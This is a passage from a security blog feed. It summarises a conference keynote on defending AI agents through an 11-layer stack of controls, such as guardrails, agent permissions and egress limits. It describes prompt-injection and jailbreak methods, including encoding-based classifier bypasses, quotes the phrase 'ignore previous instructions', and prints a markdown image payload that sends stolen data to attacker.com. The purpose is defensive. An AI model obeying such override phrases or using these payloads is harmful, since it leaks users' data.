<strong>HEARTH</strong>. Instead of threat intel dying in a Slack channel, it becomes a forkable community asset. You can try it yourself:</p>\n<ol>\n<li class=\"\"><strong>Autosubmit a CTI link:</strong> Paste a URL at <code>hearth.thorcollective.com/submit.html</code>. It opens a pre-filled GitHub issue.</li>\n<li class=\"\"><strong>AI drafts the hunt:</strong> The AI pipeline drafts the full hypothesis, properly PEAK-categorized.</li>\n<li class=\"\"><strong>Dedup check:</strong> The pipeline scores the new hunt against 130+ existing hunts to avoid duplication.</li>\n<li class=\"\"><strong>PR to the open library:</strong> GitHub Actions automatically opens a branch and a Pull Request for human review.</li>\n</ol>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"general-takeaways-1\">General Takeaways<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#general-takeaways-1\" class=\"hash-link\" aria-label=\"Direct link to General Takeaways\" title=\"Direct link to General Takeaways\" translate=\"no\">​</a></h3>\n<ul>\n<li class=\"\">Let automation and AI draft the hypothesis, but use human judgment to validate what is real.</li>\n<li class=\"\"><mark>AI always hallucinates to some degree; validation is 100% part of the job.</mark></li>\n<li class=\"\">For a solo hunter, this process turns a report into a runnable hunt in minutes. For mature programs, it helps deduplicate the backlog and increases coverage.</li>\n<li class=\"\">You can check out over 200 ready-to-use hunt hypotheses or submit TI reports to generate hunts automatically via the THOR Collective's Hearth project.</li>\n</ul>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"afternoon-keynote-defending-ai-organized-musings-on-securing-ai-agents-for-cybersecurity-by-jason-haddix\">Afternoon Keynote: \"Defending AI: Organized Musings on Securing AI Agents for Cybersecurity\" by Jason Haddix<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#afternoon-keynote-defending-ai-organized-musings-on-securing-ai-agents-for-cybersecurity-by-jason-haddix\" class=\"hash-link\" aria-label=\"Direct link to Afternoon Keynote: &quot;Defending AI: Organized Musings on Securing AI Agents for Cybersecurity&quot; by Jason Haddix\" title=\"Direct link to Afternoon Keynote: &quot;Defending AI: Organized Musings on Securing AI Agents for Cybersecurity&quot; by Jason Haddix\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"introduction-6\">Introduction<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#introduction-6\" class=\"hash-link\" aria-label=\"Direct link to Introduction\" title=\"Direct link to Introduction\" translate=\"no\">​</a></h3>\n<p>Jason, an offensive security expert with 22 years of experience at <em>Arcanum</em>, presented a beta version of their upcoming content on defending AI. The talk was built entirely from an attacker's perspective — covering the <strong>11 things he hates dealing with the most</strong> when red-teaming AI applications. These 11 layers form a \"Defense-in-Depth Stack\" and fall into two categories:</p>\n<ul>\n<li class=\"\"><strong>Probabilistic (Speed Bumps):</strong> Bypassable controls like guardrails and safety tuning that slow attackers down.</li>\n<li class=\"\"><strong>Deterministic:</strong> Hard, technology-based controls that bound the blast radius, like web application security and access management.</li>\n</ul>\n<blockquote>\n<p><em>None of these are foolproof on their own, but <mark>layered together, they create a defensible AI system</mark>.</em></p>\n</blockquote>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"real-world-ai-attacks\">Real-World AI Attacks<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#real-world-ai-attacks\" class=\"hash-link\" aria-label=\"Direct link to Real-World AI Attacks\" title=\"Direct link to Real-World AI Attacks\" translate=\"no\">​</a></h3>\n<p>Jason demonstrated how attackers exploit AI systems using <strong>Prompt Injection</strong>. Attackers use tools like <em>Parseltongue</em> (built by jailbreak group <strong>BT6</strong>, led by <em>Pliny the Prompter</em>) to encode malicious prompts in hundreds of different encodings (e.g., Unicode circle letters) to bypass classifiers, guardrails, and built-in model safety tuning. He also highlighted a recent <strong>Meta chatbot bug</strong> where an over-scoped customer support agent allowed attackers to request a password reset code for the White House Instagram account and have it sent to an attacker-controlled email — all without ever logging in.</p>\n<blockquote>\n<p><em>If Meta can make mistakes like these, we can all make mistakes like these when implementing agentic systems.</em></p>\n</blockquote>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"the-11-layers-of-the-defense-in-depth-stack\">The 11 Layers of the Defense-in-Depth Stack<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#the-11-layers-of-the-defense-in-depth-stack\" class=\"hash-link\" aria-label=\"Direct link to The 11 Layers of the Defense-in-Depth Stack\" title=\"Direct link to The 11 Layers of the Defense-in-Depth Stack\" translate=\"no\">​</a></h3>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"layer-1-web-application-security\">Layer 1: Web Application Security<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#layer-1-web-application-security\" class=\"hash-link\" aria-label=\"Direct link to Layer 1: Web Application Security\" title=\"Direct link to Layer 1: Web Application Security\" translate=\"no\">​</a></h4>\n<p>AI systems are still web applications at the end of the day, and foundational web hygiene stops many AI-specific attacks.</p>\n<ul>\n<li class=\"\"><strong>Input Validation &amp; Output Encoding:</strong> Attackers need to send through JavaScript code or Markdown syntax to smuggle data out or attack other users. If the chatbot doesn't explicitly need raw special characters (brackets, exclamation points, Unicode), sanitize or disallow them. Libraries like <em>DOMPurify</em> wreck a lot of inbound attacks. Ask yourself: <em>Does our chatbot need to handle Unicode character sets? Alternate languages? Special characters?</em> If the answer is no, strip them at the web app layer.</li>\n<li class=\"\"><strong>Character Limits:</strong> Analyze normal user conversation patterns and set character limits. Red teamers need a lot of prompt space to craft effective attacks, so restricting input length is a low-effort win.</li>\n<li class=\"\"><strong>Content Security Policy (CSP):</strong> AI systems today are agentic, with internal logging platforms, observability dashboards, and prompt caching apps — many downloaded from GitHub and not built for security. Attackers inject JavaScript or Markdown blindly into the system, hoping it renders on an internal page when a human views the logs. <mark>A tight CSP with a domain allowlist completely blocks the common image-render exfiltration trick</mark> (<code>![img](attacker.com?d=base64_stolen_data)</code>).</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"layer-2-input-guardrails\">Layer 2: Input Guardrails<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#layer-2-input-guardrails\" class=\"hash-link\" aria-label=\"Direct link to Layer 2: Input Guardrails\" title=\"Direct link to Layer 2: Input Guardrails\" translate=\"no\">​</a></h4>\n<blockquote>\n<p><em>Guardrails are essentially <mark>firewalls for LLMs</mark>.</em></p>\n</blockquote>\n<p>They inspect incoming messages for two things:</p>\n<ol>\n<li class=\"\"><strong>Prompt Injection Primitives:</strong> Known patterns like <em>\"ignore previous instructions.\"</em></li>\n<li class=\"\"><strong>Verbatim Jailbreaks:</strong> Specific known jailbreaks like \"DAN\" (Do Anything Now), roleplay jailbreaks, and the latest community-discovered bypasses.</li>\n</ol>\n<p>Features to look for in a guardrail:</p>\n<ul>\n<li class=\"\"><strong>Self-Learning:</strong> Advanced guardrails (like <em>Lakera's</em>, featured in their Gandalf CTF levels 8-9) automatically analyze successful attacks, learn the heuristics, and add new definitions to their database dynamically.</li>\n<li class=\"\"><strong>Regularly Updated Static Database:</strong> Check if the guardrail's GitHub definition file is being updated for the newest jailbreaks (e.g., the latest poetry-based Claude bypass).</li>\n<li class=\"\"><strong>Non-Standard Character Alerting:</strong> The guardrail should flag unusual character sets even if it can't determine malicious intent.</li>\n<li class=\"\"><strong>File Upload Parsing:</strong> Many bypasses come through prompt injection hidden in uploaded file metadata, not just chat text. Ensure the guardrail inspects file uploads and RAG ingestion, not just the chat context.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"layer-3-frontier-model-safety-tuning\">Layer 3: Frontier Model Safety Tuning<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#layer-3-frontier-model-safety-tuning\" class=\"hash-link\" aria-label=\"Direct link to Layer 3: Frontier Model Safety Tuning\" title=\"Direct link to Layer 3: Frontier Model Safety Tuning\" translate=\"no\">​</a></h4>\n<p>Using a frontier model from a major lab (OpenAI, Anthropic, Google) provides another layer because they come pre-tuned with built-in safety training to resist simple prompt injection and harmful content generation.</p>\n<ul>\n<li class=\"\">For organizations handling private data that can't use a hosted model directly, deploy a frontier model privately via <strong>AWS Bedrock</strong> (for Anthropic's Claude) or <strong>Microsoft Azure</strong> (for OpenAI's models). You own the instance, the data never leaves your organizational loop, and the <mark>privacy compliance burden shifts to AWS/Microsoft</mark>, with whom you likely already have contractual agreements for your cloud infrastructure.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"layer-4-llm--intent-routing\">Layer 4: LLM / Intent Routing<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#layer-4-llm--intent-routing\" class=\"hash-link\" aria-label=\"Direct link to Layer 4: LLM / Intent Routing\" title=\"Direct link to Layer 4: LLM / Intent Routing\" translate=\"no\">​</a></h4>\n<p>Before passing a request to the main model, use a small, fast, cheap LLM as a <strong>gatekeeper</strong> to classify whether the user's input belongs in your system at all.</p>\n<ul>\n<li class=\"\"><em>Example:</em> A hospital chatbot's router is prompted with: <em>\"Is this a medical support question? Answer with one word: support or other.\"</em> If someone asks how to cook meth, the router classifies it as \"other\" and drops the request before it ever reaches the main model or agents.</li>\n<li class=\"\">This can be implemented in frameworks like <strong>LangChain</strong> or <strong>Semantic Router</strong>, and the latency is negligible since users already accept some wait time in agentic systems.</li>\n<li class=\"\">For red teamers, this is frustrating because it can take <em>days if not weeks</em> to understand what request format will pass the router while still being malicious.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"layer-5-clean-rag-retrieval-augmented-generation\">Layer 5: Clean RAG (Retrieval-Augmented Generation)<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#layer-5-clean-rag-retrieval-augmented-generation\" class=\"hash-link\" aria-label=\"Direct link to Layer 5: Clean RAG (Retrieval-Augmented Generation)\" title=\"Direct link to Layer 5: Clean RAG (Retrieval-Augmented Generation)\" translate=\"no\">​</a></h4>\n<p>RAG is just hooking up a document data store to your AI app, but it introduces major risks if done carelessly.</p>\n<ul>\n<li class=\"\"><strong>Scrub PII Before Ingestion:</strong> Don't upload documents with PII into your RAG store, then rely on a prompt to tell the AI <em>\"never reveal social security numbers.\"</em> <mark>Prompt-based restrictions are always bypassable</mark> via prompt injection. Use tools like <strong>Presidio</strong> for runtime PII removal and <strong>Tika</strong>, <strong>ExifTool</strong>, or <strong>MAT2</strong> to strip metadata.</li>\n<li class=\"\"><strong>Watch for Metadata Leaks:</strong> Even if document text is scrubbed, metadata (author, timestamps, internal paths) can leak sensitive information.</li>\n<li class=\"\"><strong>Scan for Embedded Prompt Injection:</strong> Now that AI is mainstream, attackers embed prompt injections in documents (like resumes) that get ingested into your data store. Scan incoming documents, even from \"trusted\" third-party partners.</li>\n<li class=\"\"><strong>Vector-Level Authorization:</strong> Modern RAG databases now support per-user or per-document authorization at the vector level. Use these features to restrict which users can access which chunks.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"layer-6-agent-iam-identity--access-management\">Layer 6: Agent IAM (Identity &amp; Access Management)<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#layer-6-agent-iam-identity--access-management\" class=\"hash-link\" aria-label=\"Direct link to Layer 6: Agent IAM (Identity &amp; Access Management)\" title=\"Direct link to Layer 6: Agent IAM (Identity &amp; Access Management)\" translate=\"no\">​</a></h4>\n<p>Backend agents are what make AI apps powerful, but they need to be treated like employees with <mark>least-privilege access</mark>.</p>\n<ul>\n<li class=\"\"><strong>Deny by Default:</strong> Most LLMs used as agents come with all tools enabled (code execution, web search, API read/write). Start by denying everything and only enable what the specific agent needs.</li>\n<li class=\"\"><strong>Don't Control Access via Prompting:</strong> You cannot instruct an agent via its prompt to <em>\"never delete users.\"</em> That is always bypassable. Remove the capability at the <strong>configuration level</strong>, not the prompt level.</li>\n<li class=\"\"><strong>Separate Dangerous Actions:</strong> If an agent needs to read documents, it should only have <code>readDoc</code> and <code>search</code> permissions. Destructive actions like <code>deleteUser</code> or <code>executeCode</code> should be separated into a different, sandboxed agent or handled through a deterministic non-AI workflow entirely (like calling customer service or a web app flow).</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"layer-7-read-only--egress-control\">Layer 7: Read-Only + Egress Control<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#layer-7-read-only--egress-control\" class=\"hash-link\" aria-label=\"Direct link to Layer 7: Read-Only + Egress Control\" title=\"Direct link to Layer 7: Read-Only + Egress Control\" translate=\"no\">​</a></h4>\n<p>When agents interact with third-party APIs or internal data stores, enforce <strong>read-only access by default</strong> and lock down where data can go.</p>\n<ul>\n<li class=\"\">Ensure agents cannot write to or modify external systems unless explicitly required and sandboxed.</li>\n<li class=\"\">Implement egress controls that whitelist only the specific domains and IPs the agent is allowed to communicate with. If an attacker tricks an agent into exfiltrating data to <code>attacker.com</code>, egress controls stop the request.</li>\n<li class=\"\">Tie agent network communication to the source IP or session of the originating user, so agents can <mark>never initiate outbound connections to addresses not associated with the legitimate user session</mark>.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"layer-8-output-classifier\">Layer 8: Output Classifier<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#layer-8-output-classifier\" class=\"hash-link\" aria-label=\"Direct link to Layer 8: Output Classifier\" title=\"Direct link to Layer 8: Output Classifier\" translate=\"no\">​</a></h4>\n<p>While input guardrails filter what goes <em>in</em>, an output classifier filters what comes <em><strong>out</strong></em> of the model.</p>\n<ul>\n<li class=\"\">It checks the model's responses before they reach the user for leaked system prompts, PII, sensitive data, or harmful content that slipped past the input controls.</li>\n<li class=\"\">This catches scenarios where a prompt injection bypassed input guardrails but the resulting output still contains data that should never leave the system.</li>\n<li class=\"\">Like input guardrails, these can be LLM-based or regex-based, and are another probabilistic speed bump in the stack.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"layer-9-token-limits\">Layer 9: Token Limits<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#layer-9-token-limits\" class=\"hash-link\" aria-label=\"Direct link to Layer 9: Token Limits\" title=\"Direct link to Layer 9: Token Limits\" translate=\"no\">​</a></h4>\n<p>Restricting the number of tokens (input and output) that a model can process in a single interaction is a simple but effective control.</p>\n<ul>\n<li class=\"\">Large, complex prompt injections and jailbreaks require significant token budgets to craft properly. <mark>Limiting token counts restricts the attacker's workspace.</mark></li>\n<li class=\"\">On the output side, token limits prevent the model from dumping large volumes of sensitive data in a single response, even if a prompt injection is partially successful.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"layer-10-rate-limiting--cost-caps\">Layer 10: Rate Limiting &amp; Cost Caps<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#layer-10-rate-limiting--cost-caps\" class=\"hash-link\" aria-label=\"Direct link to Layer 10: Rate Limiting &amp; Cost Caps\" title=\"Direct link to Layer 10: Rate Limiting &amp; Cost Caps\" translate=\"no\">​</a></h4>\n<p>This is a deterministic control that limits how many requests a user or session can make over a given time period.</p>\n<ul>\n<li class=\"\">Attackers need to send hundreds (sometimes thousands) of requests to probe, enumerate, and brute-force a working prompt injection or jailbreak. Rate limiting forces them to slow down dramatically and increases the chance of detection.</li>\n<li class=\"\"><strong>Cost Caps</strong> set hard spending limits per user or session. This prevents abuse-of-service attacks where an attacker floods the system with expensive inference calls to rack up costs (a <mark>denial-of-wallet</mark> attack).</li>\n<li class=\"\">While not foolproof, when layered with everything else, it makes the attacker's job significantly harder and slower.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"layer-11-inference-logging--threat-hunting\">Layer 11: Inference Logging + Threat Hunting<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#layer-11-inference-logging--threat-hunting\" class=\"hash-link\" aria-label=\"Direct link to Layer 11: Inference Logging + Threat Hunting\" title=\"Direct link to Layer 11: Inference Logging + Threat Hunting\" translate=\"no\">​</a></h4>\n<p>The final layer is about <strong>visibility</strong>. If all other layers fail, you need to be able to detect and investigate what happened.</p>\n<ul>\n<li class=\"\"><strong>Log Every Inference:</strong> Capture every input, output, token usage, and tool call made by the system. This includes the full conversation context, not just the user-facing chat.</li>\n<li class=\"\"><strong>Threat Hunt AI Logs:</strong> Apply the same threat hunting principles discussed earlier in this summit to your AI inference logs. Look for anomalous patterns: unusual character sets, repeated encoding attempts, session spikes from a single IP, or agents making unexpected outbound calls.</li>\n<li class=\"\"><strong>Alerting on Anomalies:</strong> Build detection rules for known prompt injection patterns, unusual token consumption, or agents accessing data they shouldn't.</li>\n</ul>\n<blockquote>\n<p><em>This layer ensures that even if an attacker breaches every other control, their activity is <mark>recorded and can be investigated forensically</mark>.</em></p>\n</blockquote>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"references--further-reading\">References &amp; Further Reading<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#references--further-reading\" class=\"hash-link\" aria-label=\"Direct link to References &amp; Further Reading\" title=\"Direct link to References &amp; Further Reading\" translate=\"no\">​</a></h2>\n<p>Here is a compiled list of all the frameworks, tools, projects, and resources mentioned throughout the summit:</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"frameworks--methodologies\">Frameworks &amp; Methodologies<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#frameworks--methodologies\" class=\"hash-link\" aria-label=\"Direct link to Frameworks &amp; Methodologies\" title=\"Direct link to Frameworks &amp; Methodologies\" translate=\"no\">​</a></h3>\n<ul>\n<li class=\"\"><strong>PEAK Threat Hunting Framework</strong> — Splunk's modern framework for threat hunting (Prepare, Execute, Act with Knowledge). <a href=\"https://www.splunk.com/en_us/blog/security/peak-threat-hunting-framework.html\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">splunk.com/en_us/blog/security/peak-threat-hunting-framework.html</a></li>\n<li class=\"\"><strong>ATHF (Agentic Threat Hunting Framework) &amp; LOCK Format</strong> — Sydney Marrone's methodology for structuring threat hunt memory and notes.</li>\n<li class=\"\"><strong>Sqrrl Threat Hunting Loop</strong> — One of the earliest foundational frameworks for hypothesis-driven threat hunting.</li>\n<li class=\"\"><strong>MITRE ATT&amp;CK</strong> — The globally accessible knowledge base of adversary tactics and techniques. <a href=\"https://attack.mitre.org/\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">attack.mitre.org</a></li>\n<li class=\"\"><strong>Threat Hunting Maturity Model</strong> — David Bianco's five-tier model for assessing organizational threat hunting capability.</li>\n<li class=\"\"><strong>Pyramid of Pain</strong> — David Bianco's framework for understanding the value of different indicator types. <a href=\"http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html</a></li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"projects--repositories\">Projects &amp; Repositories<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#projects--repositories\" class=\"hash-link\" aria-label=\"Direct link to Projects &amp; Repositories\" title=\"Direct link to Projects &amp; Repositories\" translate=\"no\">​</a></h3>\n<ul>\n<li class=\"\"><strong>THOR Collective (HEARTH)</strong> — An open library of 200+ threat hunting hypotheses. Submit and view hunts at <a href=\"https://hearth.thorcollective.com/\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">hearth.thorcollective.com</a>. <a href=\"https://github.com/ThreatHuntingProject\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">github.com/ThreatHuntingProject</a></li>\n<li class=\"\"><strong>The DFIR Report</strong> — Detailed, actionable threat intelligence reports used to test hypothesis generation. <a href=\"https://thedfirreport.com/\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">thedfirreport.com</a></li>\n<li class=\"\"><strong>Threat Hunting Toolkit</strong> — Developed by <em>Ethan Robish</em> (BHIS), useful for standardizing interactions with Zeek logs. <a href=\"https://github.com/activecm/threat-hunting-toolkit\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">github.com/activecm/threat-hunting-toolkit</a></li>\n<li class=\"\"><strong>PEAK Assistant</strong> — David Bianco's open-source AI assistant targeting the Prepare phase of threat hunting. <a href=\"https://github.com/davidjbianco/peak-assistant\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">github.com/davidjbianco/peak-assistant</a></li>\n<li class=\"\"><strong>Parseltongue</strong> — Encoding toolset used by AI red teamers (BT6 jailbreak group) for prompt injection testing. <a href=\"https://github.com/Pliny-the-Prompter/parseltongue\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">github.com/Pliny-the-Prompter/parseltongue</a></li>\n<li class=\"\"><strong>Gandalf CTF by Lakera</strong> — Prompt injection CTF with progressive difficulty levels. <a href=\"https://gandalf.lakera.ai/\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">gandalf.lakera.ai</a></li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"tools--technologies\">Tools &amp; Technologies<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#tools--technologies\" class=\"hash-link\" aria-label=\"Direct link to Tools &amp; Technologies\" title=\"Direct link to Tools &amp; Technologies\" translate=\"no\">​</a></h3>\n<ul>\n<li class=\"\"><strong>RITA (Real Intelligence Threat Analytics)</strong> — Open-source network traffic analysis framework for detecting C2 communication, by Active Countermeasures. <a href=\"https://github.com/activecm/rita\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">github.com/activecm/rita</a></li>\n<li class=\"\"><strong>Active Countermeasures</strong> — Creators of RITA and experts in network threat hunting. <a href=\"https://www.activecountermeasures.com/\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">activecountermeasures.com</a></li>\n<li class=\"\"><strong>Zeek</strong> — Open-source network security monitoring tool. <a href=\"https://zeek.org/\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">zeek.org</a></li>\n<li class=\"\"><strong>Zui (formerly Brim)</strong> — A desktop application for analyzing packet captures and converting them to Zeek logs via Zed Lake. <a href=\"https://zui.brimdata.io/\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">zui.brimdata.io</a></li>\n<li class=\"\"><strong>DuckDB</strong> — Fast in-process analytical database used for data processing in AI agent context engineering. <a href=\"https://duckdb.org/\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">duckdb.org</a></li>\n<li class=\"\"><strong>Sigma</strong> — Generic and open signature format for SIEM systems. <a href=\"https://github.com/SigmaHQ/sigma\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">github.com/SigmaHQ/sigma</a></li>\n<li class=\"\"><strong>DOMPurify</strong> — XSS sanitizer library for HTML, MathML, and SVG, recommended for AI web app security. <a href=\"https://github.com/cure53/DOMPurify\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">github.com/cure53/DOMPurify</a></li>\n<li class=\"\"><strong>Presidio</strong> — Microsoft's open-source PII detection and anonymization SDK. <a href=\"https://github.com/microsoft/presidio\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">github.com/microsoft/presidio</a></li>\n<li class=\"\"><strong>LangChain</strong> — Framework for developing applications powered by LLMs, including intent routing. <a href=\"https://www.langchain.com/\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">langchain.com</a></li>\n<li class=\"\"><strong>Semantic Router</strong> — Fast decision-making layer for LLMs used for intent routing. <a href=\"https://github.com/aurelio-labs/semantic-router\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">github.com/aurelio-labs/semantic-router</a></li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"platforms--services\">Platforms &amp; Services<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#platforms--services\" class=\"hash-link\" aria-label=\"Direct link to Platforms &amp; Services\" title=\"Direct link to Platforms &amp; Services\" translate=\"no\">​</a></h3>\n<ul>\n<li class=\"\"><strong>AWS Bedrock</strong> — Amazon's managed service for deploying frontier models privately. <a href=\"https://aws.amazon.com/bedrock/\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">aws.amazon.com/bedrock</a></li>\n<li class=\"\"><strong>Microsoft Azure OpenAI Service</strong> — Microsoft's enterprise deployment of OpenAI models. <a href=\"https://azure.microsoft.com/en-us/products/ai-services/openai-service\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">azure.microsoft.com/en-us/products/ai-services/openai-service</a></li>\n<li class=\"\"><strong>Lakera</strong> — AI security platform providing self-learning guardrails and classifiers. <a href=\"https://www.lakera.ai/\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">lakera.ai</a></li>\n<li class=\"\"><strong>Antisyphon Training</strong> — The organization hosting the Thrunting Summit. <a href=\"https://www.antisyphontraining.com/\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">antisyphontraining.com</a></li>\n<li class=\"\"><strong>Arcanum Information Security</strong> — Jason Haddix's firm specializing in AI red teaming. <a href=\"https://www.arcanuminfosec.com/\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">arcanuminfosec.com</a></li>\n</ul>",
            "url": "https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary",
            "title": "Summary of Antisyphon Training - Threat Hunting Summit 2026",
            "summary": "This blog is a summary of talks held at Antisyphon Training Threat Hunting Summit 2026 on 17th June 2026.\n",
            "date_modified": "2026-06-28T04:00:00.000Z",
            "author": {
                "name": "Param Jasani",
                "url": "https://github.com/param-jasani"
            },
            "tags": [
                "threat-hunting",
                "thrunt",
                "RITA",
                "THOR-Collective",
                "PEAK-threat-hunting-framework",
                "MITRE-ATT&CK",
                "ATHF-Framework",
                "LOCK-Records",
                "Legal-Landmines",
                "Automated-Threat-Hunting",
                "Antisyphon-Training",
                "BHIS",
                "AI-Red-Teaming",
                "Defending-AI"
            ]
        },
        {
            "id": "https://haxnation.github.io/blog/breachforce-mumbai-meetup-june26-summary",
            "content_html": "<p>This blog is a summary of talk held at Breachforce Meetup, Mumbai held on 21st June 2026.</p>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"kubernetes-penetration-testing--configuration-review-by-abhishek-pal\">\"Kubernetes Penetration Testing &amp; Configuration Review\" by <strong>Abhishek Pal</strong><a href=\"https://haxnation.github.io/blog/breachforce-mumbai-meetup-june26-summary#kubernetes-penetration-testing--configuration-review-by-abhishek-pal\" class=\"hash-link\" aria-label=\"Direct link to kubernetes-penetration-testing--configuration-review-by-abhishek-pal\" title=\"Direct link to kubernetes-penetration-testing--configuration-review-by-abhishek-pal\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"introduction\">Introduction<a href=\"https://haxnation.github.io/blog/breachforce-mumbai-meetup-june26-summary#introduction\" class=\"hash-link\" aria-label=\"Direct link to Introduction\" title=\"Direct link to Introduction\" translate=\"no\">​</a></h3>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"the-evolution-from-physical-servers-to-containers\">The Evolution: From Physical Servers to Containers<a href=\"https://haxnation.github.io/blog/breachforce-mumbai-meetup-june26-summary#the-evolution-from-physical-servers-to-containers\" class=\"hash-link\" aria-label=\"Direct link to The Evolution: From Physical Servers to Containers\" title=\"Direct link to The Evolution: From Physical Servers to Containers\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\"><strong>Physical Servers:</strong> Originally, applications ran on single physical servers. This caused resource allocation issues; if one application spiked in resource usage, others would underperform. Scaling meant buying and maintaining more physical hardware, which was expensive and inefficient.</li>\n<li class=\"\"><strong>Virtualization (VMs):</strong> To solve this, virtualization was introduced. It allowed multiple <em>Virtual Machines (VMs)</em> to run on a single physical server. Each VM has its own full <em>Operating System (OS)</em> and virtualized hardware. This improved resource utilization and isolation, but VMs were heavy, slow to boot, and consumed significant overhead since each required a full OS.</li>\n<li class=\"\"><strong>Containers:</strong> Containers were created to solve the \"heavyweight\" problem of VMs. Instead of virtualizing the hardware, <mark>containers virtualize the Operating System</mark>. They share the host OS kernel but run in isolated user spaces. This makes them <em>extremely lightweight, fast to boot, and highly portable</em>.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"core-linux-technologies-behind-containers\">Core Linux Technologies Behind Containers<a href=\"https://haxnation.github.io/blog/breachforce-mumbai-meetup-june26-summary#core-linux-technologies-behind-containers\" class=\"hash-link\" aria-label=\"Direct link to Core Linux Technologies Behind Containers\" title=\"Direct link to Core Linux Technologies Behind Containers\" translate=\"no\">​</a></h4>\n<p>Containerization relies heavily on two native Linux kernel features:</p>\n<ul>\n<li class=\"\"><strong>Namespaces:</strong> Provide <em>process isolation</em>. They ensure that a container only sees its own restricted view of the system (e.g., its own process ID tree, network interfaces, and mount points).</li>\n<li class=\"\"><strong>cgroups (Control Groups):</strong> Provide <em>resource management</em>. They limit and monitor the amount of resources (CPU, memory, disk I/O) that a specific container can use, preventing one container from exhausting the host's resources.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"the-emergence-of-docker\">The Emergence of Docker<a 